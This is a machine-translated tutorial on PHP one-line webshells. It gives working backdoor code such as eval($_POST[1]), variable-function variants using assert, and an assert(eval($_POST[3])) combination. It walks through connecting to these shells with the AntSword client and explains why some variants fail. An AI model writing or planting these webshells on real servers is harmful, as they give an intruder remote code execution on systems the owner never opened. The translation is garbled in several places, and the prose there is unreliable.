First of all, let's introduce the simplest existence of Trojans , Commonly known as a Trojan horse

<?php
eval($_POST[1]);
?>

eval()

eval（str） It's a str String according to php Code to calculate or execute

The str The string must be legal PHP Code , And it must end with a semicolon

assert()

assert() Included in header file assert（） in , There are mainly assert（） Macro composition ,

It accepts a int Expression as its parameter , If the expression evaluates to true （1）, Then continue the execution of the program ; If it's false （0）, be assert（） The macro is in the standard error stream （stderr） Write an error message to the , And call at the same time abort（） Function to terminate the program .

assert（） The main function of the function is to assist in debugging programs .

One 、 Trojan horse test

1.1  eval()

First, construct the following Trojan horse , Test the connection with ant sword

Connect and successfully modify the file （ Insert i love you）

Two 、 Upgrade the Trojan horse and test

2.1  eval() test

<?php
$_POST[1]($_POST[2]);
?>

test 1=eval() structure eval($_POST[2])

The result is that you can't connect , Here's why

because eval It's a language constructor, not a function , Can not be Variable function call PHP Support the concept of variable function . This means that if a variable name is followed by parentheses ,PHP Will look for a function with the same name as the value of the variable , And try to execute it .

Variable functions can be used to implement, including callback functions , Some uses, including function tables . Mutable functions cannot be used, for example echo,print,unset(),isset(),empty(),include,require And similar language structures . You need to use your own wrapper functions to use these structures as variable functions .

So it seems eval In fact, it is not ‘ function ’, It is PHP Its own language structure , If you need to use ‘ variable ’ Method call , You need to build it yourself , Something like this ：

<?php
function eval_1($str)
{
   eval($str);
} 
$a='eval_1';
$a('phpinfo()');
?> 

2.2   assert() test

<?php
$_POST[1]($_POST[2]);
?>

a.    test 1=assert

The connection fails ！ Do other tests

b.    Re selection base64 Try to connect , The connection is successful ！！

c.    test 1=assert    2=$_POST[3]   base64    Connect the password ：3

  Why the seemingly normal operation , But some successful connections , Some failed again ？ This is for Zazi ？

Don't panic , Let's take the next two analyses ：

For experiment c , We make use of burpsuit Capture and analyze , You can see the obvious problem ：

  First of all ：

Let's be clear ——eval The argument in the function is the character ,assert The argument in the function is an expression （ Or a function ）

Here we are 1 Is submitted assert ,2 The submitted $_POST[3], Our intention is to implement assert($_POST[3])

And the ant sword also post 了 '3' This data becomes  %40ini_set Things like that , Lead to assert It becomes a string again , So the connection failed .

Reuse butpsuit Not selected for base64 The experiment of  b Grab the bag , so assert The following is the string , So the connection failed ！

  And when executed base64 when , Successful connection , Because there are more in the implementation eval() function , So we are actually implementing assert(eval()),eval() The parameter in is a string , Therefore, the connection is successful ！

assert('xxxx') It's just strings

assert(eval(base64xxxx)); There are eval function

3、 ... and 、 eval() And assert() Combine tests

  Test link successful ！！

Let's grab the bag and check  , The reason can be clearly found ：

We 1 Submit assert,2 Submit eval($_POST[3]), Construct executed assert(eval($_POST[3]))

At the same time satisfy assert The parameter in is function ,eval The parameter in is a string . So the execution was successful ！

summary

Finally, I want to emphasize the key points ：

eval The argument in the function is the character , Such as ：
eval('xxxx');
assert The argument in the function is an expression （ Or a function ）, Such as ：
assert(phpinfo())